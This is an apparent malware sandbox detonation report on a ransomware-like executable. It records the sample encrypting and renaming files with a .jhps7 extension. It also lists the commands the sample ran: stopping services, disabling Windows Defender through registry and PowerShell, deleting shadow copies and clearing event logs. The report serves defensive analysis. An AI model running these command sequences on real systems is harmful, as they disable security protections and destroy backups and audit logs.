| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
| Process | Command line |
| --- | --- |
| C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | "C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe" |
| C:\Windows\SysWOW64\net.exe | net.exe stop "SamSs" /y |
| C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop "SamSs" /y |
| C:\Windows\SysWOW64\net.exe | net.exe stop "SDRSVC" /y |
| C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop "SDRSVC" /y |
| C:\Windows\SysWOW64\net.exe | net.exe stop "SstpSvc" /y |
| C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop "SstpSvc" /y |
| C:\Windows\SysWOW64\net.exe | net.exe stop "UI0Detect" /y |
| C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop "UI0Detect" /y |
| C:\Windows\SysWOW64\net.exe | net.exe stop "vmicvss" /y |
| C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop "vmicvss" /y |
| C:\Windows\SysWOW64\net.exe | net.exe stop "VSS" /y |
| C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop "VSS" /y |
| C:\Windows\SysWOW64\net.exe | net.exe stop "wbengine" /y |
| C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop "wbengine" /y |
| C:\Windows\SysWOW64\net.exe | net.exe stop "WebClient" /y |
| C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop "WebClient" /y |
| C:\Windows\SysWOW64\net.exe | net.exe stop "UnistoreSvc_13561" /y |
| C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop "UnistoreSvc_13561" /y |
| C:\Windows\SysWOW64\sc.exe | sc.exe config "SamSs" start= disabled |
| C:\Windows\SysWOW64\sc.exe | sc.exe config "SDRSVC" start= disabled |
| C:\Windows\SysWOW64\sc.exe | sc.exe config "SstpSvc" start= disabled |
| C:\Windows\SysWOW64\sc.exe | sc.exe config "UI0Detect" start= disabled |
| C:\Windows\SysWOW64\sc.exe | sc.exe config "vmicvss" start= disabled |
| C:\Windows\SysWOW64\sc.exe | sc.exe config "VSS" start= disabled |
| C:\Windows\SysWOW64\sc.exe | sc.exe config "wbengine" start= disabled |
| C:\Windows\SysWOW64\sc.exe | sc.exe config "WebClient" start= disabled |
| C:\Windows\SysWOW64\sc.exe | sc.exe config "UnistoreSvc_13561" start= disabled |
| C:\Windows\SysWOW64\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f |
| C:\Windows\SysWOW64\reg.exe | reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f |
| C:\Windows\SysWOW64\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f |
| C:\Windows\SysWOW64\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f |
| C:\Windows\SysWOW64\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f |
| C:\Windows\SysWOW64\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f |
| C:\Windows\SysWOW64\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f |
| C:\Windows\SysWOW64\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f |
| C:\Windows\SysWOW64\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f |
| C:\Windows\SysWOW64\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f |
| C:\Windows\SysWOW64\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f |
| C:\Windows\SysWOW64\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f |
| C:\Windows\SysWOW64\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f |
| C:\Windows\SysWOW64\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f |
| C:\Windows\SysWOW64\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f |
| C:\Windows\SysWOW64\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f |
| C:\Windows\SysWOW64\schtasks.exe | schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable |
| C:\Windows\SysWOW64\schtasks.exe | schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable |
| C:\Windows\SysWOW64\schtasks.exe | schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable |
| C:\Windows\SysWOW64\schtasks.exe | schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable |
| C:\Windows\SysWOW64\schtasks.exe | schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable |
| C:\Windows\SysWOW64\reg.exe | reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f |
| C:\Windows\SysWOW64\reg.exe | reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f |
| C:\Windows\SysWOW64\reg.exe | reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f |
| C:\Windows\SysWOW64\reg.exe | reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f |
| C:\Windows\SysWOW64\reg.exe | reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f |
| C:\Windows\SysWOW64\reg.exe | reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f |
| C:\Windows\SysWOW64\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f |
| C:\Windows\SysWOW64\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f |
| C:\Windows\SysWOW64\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f |
| C:\Windows\SysWOW64\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f |
| C:\Windows\SysWOW64\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f |
| C:\Windows\SysWOW64\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f |
| C:\Windows\SysWOW64\vssadmin.exe | vssadmin.exe delete shadows /all /quiet |
| C:\Windows\SysWOW64\wevtutil.exe | wevtutil.exe cl system |
| C:\Windows\SysWOW64\wevtutil.exe | wevtutil.exe cl security |
| C:\Windows\SysWOW64\wevtutil.exe | wevtutil.exe cl application |
| C:\Windows\SysWOW64\Wbem\wmic.exe | wmic.exe SHADOWCOPY /nointeractive |
| C:\Windows\SysWOW64\Wbem\wmic.exe | wmic.exe shadowcopy delete |
| C:\Windows\SysWOW64\cmd.exe | cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All |
| C:\Program Files\Windows Defender\MpCmdRun.exe | "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All |
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | time.windows.com | udp |
| NL | 20.101.57.9:123 | time.windows.com | udp |
Files
memory/1292-115-0x0000000000000000-mapping.dmp
memory/3484-116-0x0000000000000000-mapping.dmp
memory/1248-117-0x0000000000000000-mapping.dmp
memory/2548-118-0x0000000000000000-mapping.dmp
memory/3700-119-0x0000000000000000-mapping.dmp
memory/2500-120-0x0000000000000000-mapping.dmp
memory/3652-121-0x0000000000000000-mapping.dmp
memory/3268-122-0x0000000000000000-mapping.dmp
memory/2688-123-0x0000000000000000-mapping.dmp
memory/2112-124-0x0000000000000000-mapping.dmp
memory/328-125-0x0000000000000000-mapping.dmp
memory/1788-126-0x0000000000000000-mapping.dmp
memory/3328-127-0x0000000000000000-mapping.dmp
memory/3872-128-0x0000000000000000-mapping.dmp
memory/3676-129-0x0000000000000000-mapping.dmp
memory/956-130-0x0000000000000000-mapping.dmp
memory/60-131-0x0000000000000000-mapping.dmp
memory/1300-132-0x0000000000000000-mapping.dmp
memory/948-133-0x0000000000000000-mapping.dmp
memory/2380-134-0x0000000000000000-mapping.dmp
memory/2356-135-0x0000000000000000-mapping.dmp
memory/1848-136-0x0000000000000000-mapping.dmp
memory/4048-137-0x0000000000000000-mapping.dmp
memory/1772-138-0x0000000000000000-mapping.dmp
memory/3128-139-0x0000000000000000-mapping.dmp
memory/3004-140-0x0000000000000000-mapping.dmp
memory/1324-141-0x0000000000000000-mapping.dmp
memory/1524-142-0x0000000000000000-mapping.dmp
memory/1384-143-0x0000000000000000-mapping.dmp
memory/2132-144-0x0000000000000000-mapping.dmp
memory/3196-145-0x0000000000000000-mapping.dmp
memory/2676-146-0x0000000000000000-mapping.dmp
memory/1680-147-0x0000000000000000-mapping.dmp
memory/2860-148-0x0000000000000000-mapping.dmp
memory/2884-149-0x0000000000000000-mapping.dmp
memory/2668-150-0x0000000000000000-mapping.dmp
memory/2548-151-0x0000000000000000-mapping.dmp
memory/1548-152-0x0000000000000000-mapping.dmp
memory/2500-153-0x0000000000000000-mapping.dmp
memory/600-154-0x0000000000000000-mapping.dmp
memory/2112-155-0x0000000000000000-mapping.dmp
memory/3040-156-0x0000000000000000-mapping.dmp
memory/2864-157-0x0000000000000000-mapping.dmp
memory/364-158-0x0000000000000000-mapping.dmp
memory/684-159-0x0000000000000000-mapping.dmp
memory/1992-160-0x0000000000000000-mapping.dmp
memory/332-161-0x0000000000000000-mapping.dmp
memory/2556-162-0x0000000000000000-mapping.dmp
memory/3952-163-0x0000000000000000-mapping.dmp
memory/2120-164-0x0000000000000000-mapping.dmp
memory/2224-165-0x0000000000000000-mapping.dmp
memory/3132-166-0x0000000000000000-mapping.dmp
memory/3124-167-0x0000000000000000-mapping.dmp
memory/1520-168-0x0000000000000000-mapping.dmp
memory/2276-169-0x0000000000000000-mapping.dmp
memory/3536-170-0x0000000000000000-mapping.dmp
memory/3204-171-0x0000000000000000-mapping.dmp
memory/4020-172-0x0000000000000000-mapping.dmp
memory/3824-173-0x0000000000000000-mapping.dmp
memory/952-174-0x0000000000000000-mapping.dmp
memory/3512-175-0x0000000000000000-mapping.dmp
memory/3496-176-0x0000000000000000-mapping.dmp
memory/528-177-0x0000000000000000-mapping.dmp
memory/3616-178-0x0000000000000000-mapping.dmp
memory/1764-180-0x00000000008F0000-0x00000000008F1000-memory.dmp
memory/1764-179-0x00000000008F0000-0x00000000008F1000-memory.dmp
memory/1764-181-0x0000000000C30000-0x0000000000C31000-memory.dmp
memory/1764-182-0x0000000004290000-0x00000000042C6000-memory.dmp
memory/1764-183-0x0000000000C32000-0x0000000000C33000-memory.dmp
memory/1764-184-0x0000000006D50000-0x0000000007378000-memory.dmp
memory/1764-185-0x0000000006930000-0x0000000006952000-memory.dmp
memory/1764-186-0x00000000073F0000-0x0000000007456000-memory.dmp
memory/1764-187-0x0000000007560000-0x00000000075C6000-memory.dmp
memory/1764-188-0x0000000007700000-0x0000000007A50000-memory.dmp
memory/1764-189-0x00000000075F0000-0x000000000760C000-memory.dmp
memory/1764-190-0x0000000007610000-0x000000000765B000-memory.dmp
memory/1764-191-0x0000000007D80000-0x0000000007DF6000-memory.dmp
memory/1764-192-0x00000000008F0000-0x00000000008F1000-memory.dmp
memory/1764-200-0x0000000006D50000-0x0000000007378000-memory.dmp
memory/1764-201-0x000000007E950000-0x000000007E951000-memory.dmp
memory/1764-202-0x0000000008BB0000-0x0000000008BE3000-memory.dmp
memory/1764-203-0x0000000008BB0000-0x0000000008BE3000-memory.dmp
memory/1764-204-0x0000000006930000-0x0000000006952000-memory.dmp
memory/1764-205-0x00000000073F0000-0x0000000007456000-memory.dmp
memory/1764-206-0x0000000007560000-0x00000000075C6000-memory.dmp
memory/1764-207-0x0000000007610000-0x000000000765B000-memory.dmp
memory/1764-208-0x0000000007D80000-0x0000000007DF6000-memory.dmp
memory/1764-209-0x0000000008AF0000-0x0000000008B0E000-memory.dmp
memory/1764-214-0x0000000008E10000-0x0000000008EB5000-memory.dmp
memory/1764-215-0x0000000000C33000-0x0000000000C34000-memory.dmp
memory/1764-216-0x0000000009190000-0x0000000009224000-memory.dmp
memory/1764-409-0x0000000009090000-0x00000000090AA000-memory.dmp
memory/1764-414-0x0000000009090000-0x00000000090AA000-memory.dmp
memory/1764-415-0x0000000009080000-0x0000000009088000-memory.dmp
memory/1764-420-0x0000000009080000-0x0000000009088000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 1c19c16e21c97ed42d5beabc93391fc5 |
| SHA1 | 8ad83f8e0b3acf8dfbbf87931e41f0d664c4df68 |
| SHA256 | 1bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05 |
| SHA512 | 7d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c |
memory/3388-433-0x0000000004140000-0x0000000004176000-memory.dmp
memory/3388-434-0x0000000006D30000-0x0000000007358000-memory.dmp
memory/3388-435-0x00000000066F0000-0x00000000066F1000-memory.dmp
memory/3388-436-0x00000000066F2000-0x00000000066F3000-memory.dmp
memory/3388-437-0x0000000006AE0000-0x0000000006B02000-memory.dmp
memory/3388-439-0x0000000007420000-0x0000000007486000-memory.dmp
memory/3388-438-0x0000000006B80000-0x0000000006BE6000-memory.dmp
memory/3388-440-0x0000000007490000-0x00000000077E0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 46213c672e82f1f8c20669652a1606a5 |
| SHA1 | b0c123a57ae84b56a8559c4c964066274e2d1ad4 |
| SHA256 | 7d8e1c5b27262d3330fd6535755326519e523f27946933e7352d9c681a3b3d71 |
| SHA512 | c58884ac19a9069d93916bb4fea48579d6ce653822b5ab1fb5ca146747bd4707600886d9febe2a810e3699aca3e8ecf9184f340f6ca6f6461329c551d1ef6b45 |
memory/3388-442-0x00000000078F0000-0x000000000790C000-memory.dmp
memory/3388-443-0x0000000007C40000-0x0000000007C8B000-memory.dmp
memory/3388-444-0x0000000007CA0000-0x0000000007D16000-memory.dmp
memory/3388-453-0x0000000006D30000-0x0000000007358000-memory.dmp
memory/3388-455-0x0000000008AD0000-0x0000000008B03000-memory.dmp
memory/3388-459-0x0000000007C40000-0x0000000007C8B000-memory.dmp
memory/3388-460-0x0000000007CA0000-0x0000000007D16000-memory.dmp
memory/3388-458-0x0000000007420000-0x0000000007486000-memory.dmp
memory/3388-457-0x0000000006B80000-0x0000000006BE6000-memory.dmp
memory/3388-456-0x0000000006AE0000-0x0000000006B02000-memory.dmp
memory/3388-454-0x0000000008AD0000-0x0000000008B03000-memory.dmp
memory/3388-461-0x0000000008AB0000-0x0000000008ACE000-memory.dmp
memory/3388-466-0x0000000008EC0000-0x0000000008F65000-memory.dmp
memory/3388-467-0x0000000009010000-0x00000000090A4000-memory.dmp
memory/3388-483-0x000000007F850000-0x000000007F851000-memory.dmp
memory/3388-485-0x00000000066F3000-0x00000000066F4000-memory.dmp
memory/3388-667-0x0000000008F90000-0x0000000008FAA000-memory.dmp
memory/3388-662-0x0000000008F90000-0x0000000008FAA000-memory.dmp
memory/3388-668-0x0000000008F80000-0x0000000008F88000-memory.dmp
memory/3388-673-0x0000000008F80000-0x0000000008F88000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2022-01-12 19:26
Reported
2022-01-12 19:31
Platform
win7-en-20211208
Max time kernel
163s
Max time network
126s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Hive
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" | C:\Windows\SysWOW64\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Modifies extensions of user files
| Description | Indicator | Process | Target |
| File renamed | C:\Users\Admin\Pictures\BackupResolve.png => C:\Users\Admin\Pictures\BackupResolve.png.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_y2N5f24_dPY0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\InstallConvertTo.raw => C:\Users\Admin\Pictures\InstallConvertTo.raw.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_7hzro7Q_Jgc0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\JoinDeny.crw.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_fHsSQzf8TFE0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\PushRemove.tiff => C:\Users\Admin\Pictures\PushRemove.tiff.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_LVhpq22wIcI0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\WatchSet.tiff => C:\Users\Admin\Pictures\WatchSet.tiff.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_e9ChL9xkWJw0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\WatchSet.tiff.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_e9ChL9xkWJw0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\JoinDeny.crw => C:\Users\Admin\Pictures\JoinDeny.crw.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_fHsSQzf8TFE0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\MeasureStep.raw.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_AvZhcYsoiGc0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\ResolveExit.tiff => C:\Users\Admin\Pictures\ResolveExit.tiff.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_kUGuFCNodDQ0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\ResolveExit.tiff.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_kUGuFCNodDQ0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\UnlockCheckpoint.tiff.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_oiyuzWfHDQ00.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\CompleteRestart.tiff.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_xHtzVD_jhqw0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\MeasureStep.raw => C:\Users\Admin\Pictures\MeasureStep.raw.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_AvZhcYsoiGc0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\PushRemove.tiff.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_LVhpq22wIcI0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\UnlockCheckpoint.tiff => C:\Users\Admin\Pictures\UnlockCheckpoint.tiff.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_oiyuzWfHDQ00.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\StopSet.tiff.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_aRZbXqUHaHk0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\BackupResolve.png.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_y2N5f24_dPY0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\CompleteRestart.tiff => C:\Users\Admin\Pictures\CompleteRestart.tiff.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_xHtzVD_jhqw0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\InstallConvertTo.raw.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_7hzro7Q_Jgc0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\StopSet.tiff => C:\Users\Admin\Pictures\StopSet.tiff.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_aRZbXqUHaHk0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
Reads user/profile data of web browsers
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\7-Zip\7z.sfx.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_6U2TucaWhHQ0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_sv.properties.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_xH0qJspj4Fo0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\rt.jar.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_slAnsTm2zaY0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_IE19xpdflrg0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsViewAttachmentIcons.jpg.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_KvGxR9Ny_tE0.jhps7 | C:\Users\Admin\AppData\Local\Temp\5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe | N/A |
